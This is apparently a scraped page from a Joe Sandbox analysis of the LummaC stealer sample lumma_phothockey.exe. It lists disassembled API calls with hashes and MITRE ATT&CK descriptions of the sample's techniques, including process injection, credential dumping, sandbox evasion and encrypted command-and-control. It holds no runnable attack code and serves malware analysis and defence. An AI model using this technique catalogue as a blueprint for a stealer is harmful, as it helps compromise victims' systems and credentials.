GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0043EE7B

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 8fcdf01db0ba0f2df18f32b171d4b3b7aeb26bf7ac7bbb80e66c346a5142cab1
Instruction ID: 32d68e83edcd118f1c55ccb3540eef66a6d91588faf4de36b672a34c28255e32
Opcode Fuzzy Hash: 8fcdf01db0ba0f2df18f32b171d4b3b7aeb26bf7ac7bbb80e66c346a5142cab1
Instruction Fuzzy Hash: 4801927410E3C14BDB719B3698697FBBBD4EB8A314F14596ED1D9C72D2CB3480058B16

Function 004491E4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00449213

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 2e0e7e89bc40d15d2892f3ea7a69a3c24fb8f6327cc1a31ecd8dfafb72f70c60
Instruction ID: 2c88fc83e9c988ab5660c6b20842b3d555faab77891ab7fdcb8184aeaec7c363
Opcode Fuzzy Hash: 2e0e7e89bc40d15d2892f3ea7a69a3c24fb8f6327cc1a31ecd8dfafb72f70c60
Instruction Fuzzy Hash: D9016B345046928FCB119F3C994429DBFA16F6A324F5483CCC8B5133EAC735AD06CB92

Function 00443DA5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00443DEE

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d457a39e3b89bd48a7778242dea9e505bb5633fd52854bd5168284318e8b7042
Instruction ID: dde5e07d24be9ed5a26e8beaf41fa03172a33cc12fb44aee953d4b1bd3d3f5a5
Opcode Fuzzy Hash: d457a39e3b89bd48a7778242dea9e505bb5633fd52854bd5168284318e8b7042
Instruction Fuzzy Hash: 14F0B7702097429FD315DF64C5A475BBBE0FF88304F01891CE0968B391DBB5A9488F86

Function 00442BFC Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00442C45

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 067a4b1083e3fac73d7dfbc3c672433e6fbf26522410cd782a5d14665af5ecd5
Instruction ID: 1364bd431f48abdb57115ab16f79ab9aa478eae9135502c4111a42983149a14c
Opcode Fuzzy Hash: 067a4b1083e3fac73d7dfbc3c672433e6fbf26522410cd782a5d14665af5ecd5
Instruction Fuzzy Hash: 4CF02EB4109701CFE315DF29D1A471ABBF4FB85308F11495CE4958B391C7B59949DF82

Function 0041CAC3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0041CAD5

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 283f6cbac61db5c8235e3cf48ed14fe2b6cab409c3c25cc0dfaa8959e338db7d
Instruction ID: 8a833a2a069e8e1f12f66c13e5a3813835c5bbe22758d6aea1cfca3aae84c137
Opcode Fuzzy Hash: 283f6cbac61db5c8235e3cf48ed14fe2b6cab409c3c25cc0dfaa8959e338db7d
Instruction Fuzzy Hash: C6D092303D43407AE1658608AC27F6422105741F26F700228B322FE2E6C990B1008A0C

Function 0041CA90 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0041CAA3

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ac88e38863b2ebc08d6babc6a896d29865f8632ccf3b2fbea6e9400b942d9500
Instruction ID: afd6d1d2367f68b70e9b812eda6477901ad257b11090bd2d221ac6c659d1ae8a
Opcode Fuzzy Hash: ac88e38863b2ebc08d6babc6a896d29865f8632ccf3b2fbea6e9400b942d9500
Instruction Fuzzy Hash: 04D097302802002BC210A71CEC2BF22362CC382316F840238F262CA1C3C810F800D2AD

Function 0044D2A0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,8180A786,5A5700FE,004188FF,8180A786), ref: 0044D2B0

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d00ee6995a7cb5e3358ade5f93d42dcbf8fe40c29f0df3a8609caa4aeb67795a
Instruction ID: 4a3bdf39a528d9ac69f2a5310572d63a538275cef87710d569249beafa4bf164
Opcode Fuzzy Hash: d00ee6995a7cb5e3358ade5f93d42dcbf8fe40c29f0df3a8609caa4aeb67795a
Instruction Fuzzy Hash: 40C04831445221ABCA106B15EC09B8A7BA8AF493A1F0244A6B804670B386A1AC929A99

Function 0044D2E2 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0044D2ED

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 60c972cb09871a070c93edff26f33e57a8d8aed75fddd7c5a27340f7df212b7f
Instruction ID: dc82d0d49189e9b6f462c634865b4d9c65d972a89a81d01b263dddf2e6878e2d
Opcode Fuzzy Hash: 60c972cb09871a070c93edff26f33e57a8d8aed75fddd7c5a27340f7df212b7f
Instruction Fuzzy Hash: 04B01234141018BBC5142B11BD09FC53E10DB94311F010095F400140B386D16855C98C

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lumma_phothockey.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
lumma_phothockey.exe

Function 02DBED10 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Function 072A0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Function 064DB628 Relevance: 3.1, Strings: 2, Instructions: 607
COMMON

Function 064DB618 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Function 07287470 Relevance: 4.2, Strings: 3, Instructions: 481
COMMON

Function 0728D6F1 Relevance: 4.1, Strings: 3, Instructions: 377
COMMON

Function 07289128 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 0724059B Relevance: 3.9, Strings: 3, Instructions: 136
COMMON

Function 072405AB Relevance: 3.9, Strings: 3, Instructions: 122
COMMON

Function 07242E9D Relevance: 3.9, Strings: 3, Instructions: 120
COMMON

Function 07283988 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Function 07282FA1 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre